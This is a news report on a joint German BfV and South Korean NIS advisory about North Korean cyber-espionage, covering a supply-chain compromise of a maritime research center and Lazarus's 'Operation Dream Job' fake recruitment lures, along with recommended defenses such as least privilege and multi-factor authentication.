BfV and NIS Issue Joint Advisory on North Korean Cyber Threats to Defense and Research Sectors
BfV and NIS Issue Joint Advisory on North Korean Cyber Threats to Defense and Research Sectors
A cybersecurity advisory, released by Germany's Bundesamt für Verfassungsschutz (BfV) and South Korea's National Intelligence Service (NIS) have jointly warned of cyber-espionage campaigns orchestrated by North Korean actors targeting the defense, and research sector. These campaigns, attributed to groups including the notorious Lazarus, aim to exfiltrate advanced military technologies to bolster North Korea's military capabilities. The advisory outlines two specific campaigns: one involving a sophisticated supply-chain attack against a maritime and shipping technologies research center, and another leveraging social engineering tactics under "Operation Dream Job" to infiltrate defense companies.
The first campaign executed by the threat actors involved a strategic compromise of a third-party vendor, paving the way for unauthorized entry into the target's network via compromised SSH credentials and facilitating lateral movement. They were able to implant malware and used tools such as curl to download additional malicious payloads from command and control (C2) servers, including a tunneling tool (Ngrok) for remote access and a Base64-encoded Python script functioning as a downloader. The culmination of this attack involved the deployment of "remote-control malware through a patch management system (PMS) of the research center," as highlighted in the advisory. This attack enabled the attackers to pilfer valuable account information and email content.
The second campaign, "Operation Dream Job," involved the continued exploitation of social engineering to deceive employees in the defense sector through fabricated job offers, leading to the deployment of initial-stage malware. Attributed to the North Korean threat group Lazarus, this operation has been active since 2020, employing non-technical strategies to circumvent traditional security measures. The attackers meticulously crafted headhunter profiles on job portals to entice potential candidates with alluring job propositions. By exploiting the inherent trust between employers and prospective employees, the attackers increased the likelihood of their targets downloading malicious payloads.
To bolster security defenses, the BfV and NIS recommend that organizations enforce the principle of least privilege, establish robust password policies, and adopt multi-factor authentication. Additionally, they emphasize the importance of user awareness regarding the tactics employed by threat actors, especially concerning phishing attacks.